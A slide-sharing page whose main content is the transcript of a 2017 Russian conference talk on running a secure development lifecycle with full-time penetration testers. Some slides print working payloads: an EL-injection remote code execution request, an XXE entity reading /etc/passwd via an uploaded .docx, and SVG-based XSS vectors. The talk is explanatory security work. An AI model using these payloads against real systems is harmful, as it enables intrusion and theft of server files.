Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
Ontico
 
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
Ontico
 
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
Ontico
 
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
Ontico
 
100500 способов кэширования в Oracle Database или как достичь максимальной ск...
100500 способов кэширования в Oracle Database или как достичь максимальной ск...100500 способов кэширования в Oracle Database или как достичь максимальной ск...
100500 способов кэширования в Oracle Database или как достичь максимальной ск...
Ontico
 
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
Ontico
 
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
Ontico
 

More from Ontico (20)

One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
One-cloud — система управления дата-центром в Одноклассниках / Олег Анастасье...
 
Масштабируя DNS / Артем Гавриченков (Qrator Labs)
Масштабируя DNS / Артем Гавриченков (Qrator Labs)Масштабируя DNS / Артем Гавриченков (Qrator Labs)
Масштабируя DNS / Артем Гавриченков (Qrator Labs)
 
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
Создание BigData-платформы для ФГУП Почта России / Андрей Бащенко (Luxoft)
 
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
Готовим тестовое окружение, или сколько тестовых инстансов вам нужно / Алекса...
 
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
Новые технологии репликации данных в PostgreSQL / Александр Алексеев (Postgre...
 
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
PostgreSQL Configuration for Humans / Alvaro Hernandez (OnGres)
 
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
Inexpensive Datamasking for MySQL with ProxySQL — Data Anonymization for Deve...
 
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
 
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
ProxySQL Use Case Scenarios / Alkin Tezuysal (Percona)
 
MySQL Replication — Advanced Features / Петр Зайцев (Percona)
MySQL Replication — Advanced Features / Петр Зайцев (Percona)MySQL Replication — Advanced Features / Петр Зайцев (Percona)
MySQL Replication — Advanced Features / Петр Зайцев (Percona)
 
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
Внутренний open-source. Как разрабатывать мобильное приложение большим количе...
 
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
Подробно о том, как Causal Consistency реализовано в MongoDB / Михаил Тюленев...
 
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
Балансировка на скорости проводов. Без ASIC, без ограничений. Решения NFWare ...
 
Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
Перехват трафика — мифы и реальность / Евгений Усков (Qrator Labs)
 
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
И тогда наверняка вдруг запляшут облака! / Алексей Сушков (ПЕТЕР-СЕРВИС)
 
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
Как мы заставили Druid работать в Одноклассниках / Юрий Невиницин (OK.RU)
 
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
Разгоняем ASP.NET Core / Илья Вербицкий (WebStoating s.r.o.)
 
100500 способов кэширования в Oracle Database или как достичь максимальной ск...
100500 способов кэширования в Oracle Database или как достичь максимальной ск...100500 способов кэширования в Oracle Database или как достичь максимальной ск...
100500 способов кэширования в Oracle Database или как достичь максимальной ск...
 
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
Apache Ignite Persistence: зачем Persistence для In-Memory, и как он работает...
 
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
Механизмы мониторинга баз данных: взгляд изнутри / Дмитрий Еманов (Firebird P...
 

Recently uploaded

Introduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.pptIntroduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.ppt
Dwarkadas J Sanghvi College of Engineering
 
一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理
uqyfuc
 
Open Channel Flow: fluid flow with a free surface
Open Channel Flow: fluid flow with a free surfaceOpen Channel Flow: fluid flow with a free surface
Open Channel Flow: fluid flow with a free surface
Indrajeet sahu
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
ecqow
 
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODELDEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
ijaia
 
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
upoux
 
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by AnantLLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
Anant Corporation
 
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptxSENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
b0754201
 
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENTNATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
Addu25809
 
OOPS_Lab_Manual - programs using C++ programming language
OOPS_Lab_Manual - programs using C++ programming languageOOPS_Lab_Manual - programs using C++ programming language
OOPS_Lab_Manual - programs using C++ programming language
PreethaV16
 
TIME TABLE MANAGEMENT SYSTEM testing.pptx
TIME TABLE MANAGEMENT SYSTEM testing.pptxTIME TABLE MANAGEMENT SYSTEM testing.pptx
TIME TABLE MANAGEMENT SYSTEM testing.pptx
CVCSOfficial
 
SCALING OF MOS CIRCUITS m .pptx
SCALING OF MOS CIRCUITS m                 .pptxSCALING OF MOS CIRCUITS m                 .pptx
SCALING OF MOS CIRCUITS m .pptx
harshapolam10
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
VANDANAMOHANGOUDA
 
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
upoux
 
5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf
AlvianRamadhani5
 
Digital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptxDigital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptx
aryanpankaj78
 
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
shadow0702a
 
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
ydzowc
 
2. protection of river banks and bed erosion protection works.ppt
2. protection of river banks and bed erosion protection works.ppt2. protection of river banks and bed erosion protection works.ppt
2. protection of river banks and bed erosion protection works.ppt
abdatawakjira
 
Mechatronics material . Mechanical engineering
Mechatronics material . Mechanical engineeringMechatronics material . Mechanical engineering
Mechatronics material . Mechanical engineering
sachin chaurasia
 

Recently uploaded (20)

Introduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.pptIntroduction to Computer Networks & OSI MODEL.ppt
Introduction to Computer Networks & OSI MODEL.ppt
 
一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理
 
Open Channel Flow: fluid flow with a free surface
Open Channel Flow: fluid flow with a free surfaceOpen Channel Flow: fluid flow with a free surface
Open Channel Flow: fluid flow with a free surface
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
 
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODELDEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
 
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
一比一原版(uofo毕业证书)美国俄勒冈大学毕业证如何办理
 
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by AnantLLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
 
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptxSENTIMENT ANALYSIS ON PPT AND Project template_.pptx
SENTIMENT ANALYSIS ON PPT AND Project template_.pptx
 
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENTNATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
NATURAL DEEP EUTECTIC SOLVENTS AS ANTI-FREEZING AGENT
 
OOPS_Lab_Manual - programs using C++ programming language
OOPS_Lab_Manual - programs using C++ programming languageOOPS_Lab_Manual - programs using C++ programming language
OOPS_Lab_Manual - programs using C++ programming language
 
TIME TABLE MANAGEMENT SYSTEM testing.pptx
TIME TABLE MANAGEMENT SYSTEM testing.pptxTIME TABLE MANAGEMENT SYSTEM testing.pptx
TIME TABLE MANAGEMENT SYSTEM testing.pptx
 
SCALING OF MOS CIRCUITS m .pptx
SCALING OF MOS CIRCUITS m                 .pptxSCALING OF MOS CIRCUITS m                 .pptx
SCALING OF MOS CIRCUITS m .pptx
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
 
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
 
5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf5G Radio Network Througput Problem Analysis HCIA.pdf
5G Radio Network Througput Problem Analysis HCIA.pdf
 
Digital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptxDigital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptx
 
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
 
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
 
2. protection of river banks and bed erosion protection works.ppt
2. protection of river banks and bed erosion protection works.ppt2. protection of river banks and bed erosion protection works.ppt
2. protection of river banks and bed erosion protection works.ppt
 
Mechatronics material . Mechanical engineering
Mechatronics material . Mechanical engineeringMechatronics material . Mechanical engineering
Mechatronics material . Mechanical engineering
 

Внедрение SDLC в боевых условиях / Егор Карбутов (Digital Security)

  • 1. Внедрение SDLC в боевых условиях Карбутов Егор 05.06.2017 ‹#›
  • 2. $ Whoami • Penetration tester @ Digital Security • Bug Hunter Внедрение SDLC в боевых условиях 2 Cure53 05.06.2017
  • 3. Agenda • Work Organization • Types of Penetration Testing • SDLC? • +/- • Product Components • Team • PLAN-PLAN • Bugs and Practice • Tools • Some security bugs • Success BugBounty Stories • Conclusion Внедрение SDLC в боевых условиях 305.06.2017
  • 4. Внедрение SDLC в боевых условиях 4 Work Organization 05.06.2017
  • 5. Types of Penetration Testing Внедрение SDLC в боевых условиях 5 One Iteration 05.06.2017
  • 6. Types of Penetration Testing Внедрение SDLC в боевых условиях 6 One Iteration N Iteration Per Year 05.06.2017
  • 7. Types of Penetration Testing Внедрение SDLC в боевых условиях 7 One Iteration N Iteration Per Year Outsource BugBounty 05.06.2017
  • 8. Types of Penetration Testing Внедрение SDLC в боевых условиях 8 Full Time Penetration Testing One Iteration N Iteration Per Year Outsource BugBounty 05.06.2017
  • 9. SDLC/SSDL • The systems development life cycle (SDLC)/Secure software development lifecycle (SSDL) • Who Uses • MS • CISCO Внедрение SDLC в боевых условиях 9 MS Process Guidance: https://msdn.microsoft.com/ru-ru/library/windows/desktop/84aed186-1d75-4366-8e61-8d258746bopq.aspx 05.06.2017
  • 10. Classic Types of Penetration Testing • So much report • Low awareness about services • Lack of communication with developers • Rotation of auditors • Full Black box OR Grey box Внедрение SDLC в боевых условиях 1005.06.2017
  • 11. Внедрение SDLC в боевых условиях 11 What do you know about us? 05.06.2017
  • 12. Components • Web • Services: Mail, Calendar, Contacts, Disk, Documents, Admin Console, Logos (messenger) • Mobile App • App: Documents, Mail, Messenger • Platforms: iOS, Android, Tizen • Desktop App • App: Document, Mail, Messenger • Platforms: Linux, OS X, Windows • Server API • Internal services (Redis, Swift e.t.c) Внедрение SDLC в боевых условиях 1205.06.2017
  • 13. Team Внедрение SDLC в боевых условиях 13 • Three people at full time 05.06.2017
  • 14. PLAN-PLAN • One Slot = One Week • One Month = Four Slot • One Sprint = Three Month • One Year = Four Sprints • One Year = Four Releases Внедрение SDLC в боевых условиях 1405.06.2017
  • 15. PLAN-PLAN • 1 – Web App (Mail, Contacts, Calendar) • 2 – Web App (Mail, Contacts, Calendar) • 3 – Mobile App for Android, iOS, Tizen • 4 – Mobile App for Android, iOS, Tizen • 5 – Auth SSO Server; Web App Back-end • 6 – File Server Back-end, Admin Web App + API • 7 – Web App Documents Editor + Back-end Documents Editor • 8 – Desktop App Files • 9 – Desktop App Mail, Contacts, Calendar, Documents • 10 – Messengers for Web, MacOS, Win, Linux + API • 11 – Misc • 12 – Misc • 13 – Misc Внедрение SDLC в боевых условиях 1505.06.2017
  • 16. Say report again! Внедрение SDLC в боевых условиях 1605.06.2017
  • 17. Внедрение SDLC в боевых условиях 17 Our reporting 05.06.2017
  • 18. Внедрение SDLC в боевых условиях 18 Bugs and Practice 05.06.2017
  • 19. Tools: Burp • Burp • Web Proxy • Scanner • Repeater • Intruder • Spider • ............. Внедрение SDLC в боевых условиях 1905.06.2017
  • 20. Tools: MobSF • Static & Dynamic Analysis Внедрение SDLC в боевых условиях 2005.06.2017
  • 21. Tools: Tizen IDE • No one knows about the safety of this (Almost) • Use Tizen IDE Внедрение SDLC в боевых условиях 2105.06.2017
  • 22. Remote Code Execution – EL Injection • Expression Language (EL) Injection happens when attacker controlled data enters an EL interpreter. • Risk: RCE • ${5*5} = 25 • ?vulnerable=T(java.lang.Runtime).getRuntime().exec(“cmd.exe”) • Spring Framework < 3.0.6 Внедрение SDLC в боевых условиях 2205.06.2017
  • 23. Remote Code Execution – EL Injection • GET /api/?X-Atmosphere-tracking- id=${shell=T(org.apache.commons.io.IOUtils).toString(0x7b)+T(org.apache.commons.i o.IOUtils).toString(0x70)+T(org.apache.commons.io.IOUtils).toString(0x69)+T(org.apac he.commons.io.IOUtils).toString(0x6e)+T(org.apache.commons.io.IOUtils).toString(0x6 7)+T(org.apache.commons.io.IOUtils).toString(0x64)+T(org.apache.commons.io.IOUtils ).toString(0x2d)+T(org.apache.commons.io.IOUtils).toString(0x63)+T(org.apache.com mons.io.IOUtils).toString(0x543)+T(org.apache.commons.io.IOUtils).toString(0x33)+T(o rg.apache.commons.io.IOUtils).toString(0x2c)+T(org.apache.commons.io.IOUtils).toStri ng(0x37)+T(org.apache.commons.io.IOUtils).toString(0x52)+T(org.apache.commons.io. IOUtils).toString(0x54)+T(org.apache.commons.io.IOUtils).toString(0x12)+T(org.apache .commons.io.IOUtils).toString(0x34)+T(org.apache.commons.io.IOUtils).toString(0x36) +T(org.apache.commons.io.IOUtils).toString(0x21)+T(org.apache.commons.io.IOUtils).t oString(0x32)+T(org.apache.commons.io.IOUtils).toString(0x42)+T(org.apache.commo ns.io.IOUtils).toString(0x23)+T(org.apache.commons.io.IOUtils).toString(0x31)+T(org.a pache.commons.io.IOUtils).toString(0x22)+T(org.apache.commons.io.IOUtils).toString( 0x64)+T(org.apache.commons.io.IOUtils).toString(0x12)}--whatisSHELL${shell}--- ${T(java.lang.Runtime).getRuntime().exec(shell)} Внедрение SDLC в боевых условиях 2305.06.2017
  • 24. Remote Code Execution – EL Injection PayPal Внедрение SDLC в боевых условиях 24 http://www.piyushmalik.com/2014/03/el-injection-in-paypal-and-dollars-in.html 05.06.2017
  • 25. Remote Code Execution – EL Injection PayPal Внедрение SDLC в боевых условиях 25 http://www.piyushmalik.com/2014/03/el-injection-in-paypal-and-dollars-in.html 05.06.2017
  • 26. XML External Entity Внедрение SDLC в боевых условиях 26 • An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. • Risk: • DOS • SSRF • Port Scaning • Reading files 05.06.2017
  • 27. XML External Entity Внедрение SDLC в боевых условиях 27 • Creating .docx document (docx = zip) • Unzip document • Added to one of the xml: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> … <foo>&xxe;</foo> • Zip document • Upload to server 05.06.2017
  • 28. XML External Entity Внедрение SDLC в боевых условиях 2805.06.2017
  • 29. XML External Entity Tool: OXML_XXE Внедрение SDLC в боевых условиях 29 • This tool is meant to help test XXE vulnerabilities in OXML document file formats. Currently supported: • DOCX/XLSX/PPTX • ODT/ODG/ODP/ODS • SVG • XML • PDF • JPG • GIF https://github.com/BuffaloWill/oxml_xxe 05.06.2017
  • 30. XML External Entity - Yandex Внедрение SDLC в боевых условиях 30 @vah_13 05.06.2017
  • 31. Success BugBounty Stories • DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It's written in JavaScript and works in all modern browsers: • Safari • Opera (15+) • Internet Explorer (10+) • Firefox • Chrome • Anything else using Blink or WebKit • Developers and Contributors: • @0x6D6172696F • @filedescriptor • @shafigullin Внедрение SDLC в боевых условиях 31 Cure53 05.06.2017
  • 32. Success BugBounty Stories • Classic Vector Make Money only for Safari: • <svg onload=alert(document.domain)> Внедрение SDLC в боевых условиях 32 Cure53 05.06.2017
  • 33. Success BugBounty Stories Внедрение SDLC в боевых условиях 33 Cure53 05.06.2017
  • 34. Success BugBounty Stories Внедрение SDLC в боевых условиях 34 Cure53 05.06.2017
  • 35. Success BugBounty Stories • DOMPurify XSS for Safari ---> Safari document.implementation problem • Incorrect SVG tag handling + Processing pages using vuln functions Внедрение SDLC в боевых условиях 35 Cure53 05.06.2017
  • 36. Success BugBounty Stories • NodeBB XSS • Exact steps to cause this issue • Change user email to 2@ya.ru"><svg/onload=alert(1)> (http://192.168.189.133:4567/user/:userslug/edit/email) • Admin go to http://192.168.189.133:4567/admin/manage/users/search • Search users by username or email • Javascript executed Внедрение SDLC в боевых условиях 3605.06.2017
  • 37. Success BugBounty Stories Внедрение SDLC в боевых условиях 3705.06.2017
  • 38. Success BugBounty Stories • NodeBB security issue Внедрение SDLC в боевых условиях 38 @andrewaeva 05.06.2017
  • 39. Conclusion • Auditors have a lot of information about the process of developing internal services • Access to the source code • The opportunity to participate in the construction of an architecture • Shifting work from the black box to the white box • Problem with reporting • Competent allocation of auditors' resources • Increase the level of an expertise due to a large number of different services • Research of third-party products (bugbounty, public regards) • A more detailed research of the system - search for more complex vulnerabilities Внедрение SDLC в боевых условиях 3905.06.2017
  • 40. Links • MS Process Guidance: https://msdn.microsoft.com/ru-ru/library/windows/desktop/84aed186-1d75- 4366-8e61-8d258746bopq.aspx • Burp – https://portswigger.net/burp/ • MobSF – https://github.com/MobSF/Mobile-Security-Framework-MobSF • OXML_XXE – https://github.com/BuffaloWill/oxml_xxe • DOMPurify – https://github.com/cure53/DOMPurify • NodeBB – https://github.com/NodeBB/NodeBB • PayPal EL Injection – http://www.piyushmalik.com/2014/03/el-injection-in- paypal-and-dollars-in.html Внедрение SDLC в боевых условиях 4005.06.2017
  • 41. Any questions? Thanks! Внедрение SDLC в боевых условиях 41 @ShikariSenpai 05.06.2017